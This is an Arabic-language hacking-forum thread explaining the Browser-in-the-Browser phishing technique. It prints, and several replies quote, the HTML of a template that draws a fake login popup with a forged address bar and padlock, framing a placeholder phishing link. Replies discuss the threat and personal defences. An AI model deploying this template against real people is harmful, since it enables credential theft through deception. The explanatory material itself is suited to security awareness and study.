[ شرح ] تقنية هجوم المتصفح في المتصفح الأصلي (BITB)

KLD · 4 سبتمبر 2024

بسم الله الرحمن الرحيم

ما هي تقنية هجوم المتصفح في المتصفح الأصلي ؟

أخليكم مع الصوره تشرح نفسها:

حسنًا للتوضيح :
الفكرة عندما تقوم بفتح موقع مثلاً وتحاول تسجيل الدخول باستخدام حساب gmail أو مايكروسوفت تقوم بضغط على تسجيل دخول، لكن هنا النافذه منبثقة عبارة عن "صفحة مزورة"

نعم صديقي

إنها صفحة مزورة وتوجد ثيمات تشابهه نظامين (ويندوز - ماك أو أس ) ويمكنك تعديل على النافذة المنبثة بشكل كامل حتى أنه يمكنك تغير الرابط .

رابط التحميل: تحميل

عند فتح الضغط عن الملف سوف تجد عدة ملفات كل ملف عبارة عن ثيم للنافذه المنبثة

سوف اختار ملف Windows-DarkMode-Delay
عندما تقوم بفتح السورس كود ستجد التالي (index.html)

استكمال الشرح داخل السورس:

HTML:

[CODE=html]<!DOCTYPE html>

<html>

<head>

    <meta charset="utf-8">

    <meta name="viewport" content="width=device-width, initial-scale=1">

    <link rel="stylesheet" href="style.css">

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>

</head>

<body>

<button id="clickme" style="margin-left:auto; margin-right: auto; margin-top: 2.5%; text-align: center; display: block;">Click me</button>

<div id="window" style="margin:auto; position: relative; bottom: 2.5%; display: none;">

<!-- Title bar start -->

<div id="title-bar-width">

    <div id="title-bar">

        <div style="margin-top:5px;">

            <img src="./logo.svg" width="20px" height="15px" id="logo">  <!-- ايقونه الموقع  -->

            <span id="logo-description">XX-TITLE-XX</span> <!-- اسم الصفحة المراد تزويرها -->

        </div>


        <div>

            <span id="minimize">&#8212;</span>

            <span id="square">□</span>

            <span id="exit">✕</span>

        </div>

    </div>

    <div id="url-bar">

        <img src="./ssl.svg" width="20px" height="20px" id="ssl-padlock">

        <span id="domain-name">XX-DOMAIN-NAME-XX</span><!-- الدومين فقط مثال (www.google.com)  -->

        <span id="domain-path">XX-DOMAIN-PATH-XX</span> <!-- تكلمة العنوان مثال (login) -->

    </div>

</div>

<!-- Content start -->

<iframe id="content" src="XX-PHISHING-LINK-XX" frameBorder="0"></iframe> <!-- رابط صفحة الاصلية المراد استنساخها  -->

</div>

</body>

<script src="script.js"></script>

</html>

نعتذر على الشرح المختصر
دمتم في أمان الله

تم تطوير الهجوم من قبل mrd0x

r00tki113r · 4 سبتمبر 2024

KLD قال:
بسم الله الرحمن الرحيم

ما هي تقنية هجوم المتصفح في المتصفح الاصلي ؟
اخليكم مع الصوره تشرح نفسها
مشاهدة المرفق 13243
حسنا للتوضيح :
الفكره عندما تقوم بفتح موقع مثلاا وتحاول التسجيل دخول ب استخدام حساب gmail او مايكروسوفت تقوم بضغط على التسجيل دخول لكن هنا النافذه منبثقة عباره عن "صفحة مزورة"
نعم صديقي
انها صفحة مزوره وتوجد ثيمات تشابهه نظامين (ويندوز - ماك او اس )
ويمكنك تعديل على النافذة المنبثة بشكل كامل حتى ان يمكنك تغير الرابط .
رابط التحميل
تحميل
عند فتح الضغط عن الملف سوف تجد عدة ملفات كل ملف عباره عن ثيم للنافذه المنبثة
سوف اختار ملف Windows-DarkMode-Delay
عندما تقوم بفتح السورس كود ستجد التالي (index.html) استكمال الشرح داخل السورس

HTML:

[CODE=html]<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="style.css"> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> </head> <body> <button id="clickme" style="margin-left:auto; margin-right: auto; margin-top: 2.5%; text-align: center; display: block;">Click me</button> <div id="window" style="margin:auto; position: relative; bottom: 2.5%; display: none;">  <div id="title-bar-width"> <div id="title-bar"> <div style="margin-top:5px;"> <img src="./logo.svg" width="20px" height="15px" id="logo">  <span id="logo-description">XX-TITLE-XX</span>  </div> <div> <span id="minimize">—</span> <span id="square">□</span> <span id="exit">✕</span> </div> </div> <div id="url-bar"> <img src="./ssl.svg" width="20px" height="20px" id="ssl-padlock"> <span id="domain-name">XX-DOMAIN-NAME-XX</span> <span id="domain-path">XX-DOMAIN-PATH-XX</span>  </div> </div>  <iframe id="content" src="XX-PHISHING-LINK-XX" frameBorder="0"></iframe>  </div> </body> <script src="script.js"></script> </html>

أسف على الشرح المختصر دمتم في امان الله
[/CODE]

تم تطوير الهجوم من قبل mrd0x

يعطيك العافية وبننتظر جديدك, تحياتي لكم جميعا

KLD · 4 سبتمبر 2024

r00tki113r قال:
يعطيك العافية وبننتظر جديدك, تحياتي لكم جميعا

نورت الموضوع اخوي .

STORM · 4 سبتمبر 2024

KLD قال:
بسم الله الرحمن الرحيم

ما هي تقنية هجوم المتصفح في المتصفح الاصلي ؟
اخليكم مع الصوره تشرح نفسها
مشاهدة المرفق 13243
حسنا للتوضيح :
الفكره عندما تقوم بفتح موقع مثلاا وتحاول التسجيل دخول ب استخدام حساب gmail او مايكروسوفت تقوم بضغط على التسجيل دخول لكن هنا النافذه منبثقة عباره عن "صفحة مزورة"
نعم صديقي
انها صفحة مزوره وتوجد ثيمات تشابهه نظامين (ويندوز - ماك او اس )
ويمكنك تعديل على النافذة المنبثة بشكل كامل حتى ان يمكنك تغير الرابط .
رابط التحميل
تحميل
عند فتح الضغط عن الملف سوف تجد عدة ملفات كل ملف عباره عن ثيم للنافذه المنبثة
سوف اختار ملف Windows-DarkMode-Delay
عندما تقوم بفتح السورس كود ستجد التالي (index.html) استكمال الشرح داخل السورس

HTML:

[CODE=html]<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="style.css"> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> </head> <body> <button id="clickme" style="margin-left:auto; margin-right: auto; margin-top: 2.5%; text-align: center; display: block;">Click me</button> <div id="window" style="margin:auto; position: relative; bottom: 2.5%; display: none;">  <div id="title-bar-width"> <div id="title-bar"> <div style="margin-top:5px;"> <img src="./logo.svg" width="20px" height="15px" id="logo">  <span id="logo-description">XX-TITLE-XX</span>  </div> <div> <span id="minimize">—</span> <span id="square">□</span> <span id="exit">✕</span> </div> </div> <div id="url-bar"> <img src="./ssl.svg" width="20px" height="20px" id="ssl-padlock"> <span id="domain-name">XX-DOMAIN-NAME-XX</span> <span id="domain-path">XX-DOMAIN-PATH-XX</span>  </div> </div>  <iframe id="content" src="XX-PHISHING-LINK-XX" frameBorder="0"></iframe>  </div> </body> <script src="script.js"></script> </html>

أسف على الشرح المختصر دمتم في امان الله
[/CODE]

تم تطوير الهجوم من قبل mrd0x

بارك الله فيك حبيبنا وجزاك الله كل خير
المشكلة بهاي الصفحات أن المستخدم ما يعرف الدومينات الاصلية للمواقع المستخدمة بتسجيل الدخول.
ننتظر جديدك دائماً

أبو البراء · 4 سبتمبر 2024

كثير من الناس تظن إن هجمات الPhishing أسهل شي ممكن تتصدى له وإنه ليس سوا مجرد صفحة مزورة ولا يععلومةن شيئا عن التقنيات والاستراتيجيات الشيطانية المستخدمة في هذا النوع من الهجمات
وهذا إحدى التقنيات
بارك الله فيك على هذه المشاركة

KLD · 5 سبتمبر 2024

STORM قال:
بارك الله فيك حبيبنا وجزاك الله كل خير
المشكلة بهاي الصفحات أن المستخدم ما يعرف الدومينات الاصلية للمواقع المستخدمة بتسجيل الدخول.
ننتظر جديدك دائماً

نعم بالطبع و أصبحت هناك طرق مثل هذي الطريقة ,حيث يمكنك كتابة الدومين الاصلي اعلى الصفحة والسورس كود مفتوح يمكنك تطويره بسهولة

KLD · 5 سبتمبر 2024

أبو البراء قال:
كثير من الناس تظن إن هجمات الPhishing أسهل شي ممكن تتصدى له وإنه ليس سوا مجرد صفحة مزورة ولا يععلومةن شيئا عن التقنيات والاستراتيجيات الشيطانية المستخدمة في هذا النوع من الهجمات
وهذا إحدى التقنيات
بارك الله فيك على هذه المشاركة

نعم بالطبع وفي الفترة الاخيره ظهرت العديد من الطرق وسوف نتطرق لها في ما بعد ان شاء الله .

KLD · 5 سبتمبر 2024

STORM قال:
صدقاً وانا بتكلم على مستواي الشخصي اخر حل لقيته لهاي الامور ان لي شخصيتين على الانترنت
وحدة رسمية بإسم رسمي بإيميل رسمي برقم رسمي وهاي نادراً جداً ما استخدمها
والثانية كل حاجة فيها وهمي ومش مهم وما عليها معلومات مهمة بحيث لو انسرق اي حاجة منها بساعة غفلة او خطأ يكون الضرر اقل ما يمكن.

افضل شي تسويه الصراحة

adnan · الأمس في 13:45

KLD قال:
بسم الله الرحمن الرحيم

ما هي تقنية هجوم المتصفح في المتصفح الأصلي ؟

أخليكم مع الصوره تشرح نفسها:

مشاهدة المرفق 13243

حسنا للتوضيح :
الفكرة عندما تقوم بفتح موقع مثلاً وتحاول تسجيل الدخول باستخدام حساب gmail أو مايكروسوفت تقوم بضغط على تسجيل دخول، لكن هنا النافذه منبثقة عبارة عن "صفحة مزورة"

نعم صديقي
إنها صفحة مزورة وتوجد ثيمات تشابهه نظامين (ويندوز - ماك أو أس ) ويمكنك تعديل على النافذة المنبثة بشكل كامل حتى أنه يمكنك تغير الرابط .

رابط التحميل: تحميل

عند فتح الضغط عن الملف سوف تجد عدة ملفات كل ملف عبارة عن ثيم للنافذه المنبثة

سوف اختار ملف Windows-DarkMode-Delay
عندما تقوم بفتح السورس كود ستجد التالي (index.html)

استكمال الشرح داخل السورس:

HTML:

[CODE=html]<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="style.css"> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> </head> <body> <button id="clickme" style="margin-left:auto; margin-right: auto; margin-top: 2.5%; text-align: center; display: block;">Click me</button> <div id="window" style="margin:auto; position: relative; bottom: 2.5%; display: none;">  <div id="title-bar-width"> <div id="title-bar"> <div style="margin-top:5px;"> <img src="./logo.svg" width="20px" height="15px" id="logo">  <span id="logo-description">XX-TITLE-XX</span>  </div> <div> <span id="minimize">—</span> <span id="square">□</span> <span id="exit">✕</span> </div> </div> <div id="url-bar"> <img src="./ssl.svg" width="20px" height="20px" id="ssl-padlock"> <span id="domain-name">XX-DOMAIN-NAME-XX</span> <span id="domain-path">XX-DOMAIN-PATH-XX</span>  </div> </div>  <iframe id="content" src="XX-PHISHING-LINK-XX" frameBorder="0"></iframe>  </div> </body> <script src="script.js"></script> </html>

نعتذر على الشرح المختصر
دمتم في أمان الله

تم تطوير الهجوم من قبل mrd0x

ممكن تشرح لي فيديو لو سمحت

[ شرح ] تقنية هجوم المتصفح في المتصفح الأصلي (BITB)

KLD

./عضو نشيط

r00tki113r

./عضو نشيط

KLD

./عضو نشيط

STORM

>_ عضو ماسي _<

أبو البراء

{|| King Of Noobs ||}

KLD

./عضو نشيط

KLD

./عضو نشيط

KLD

./عضو نشيط

adnan

./عضو جديد

آخر المشاركات

فانوس

الأعضاء المتصلون

إحصائيات المنتدى

إعلانات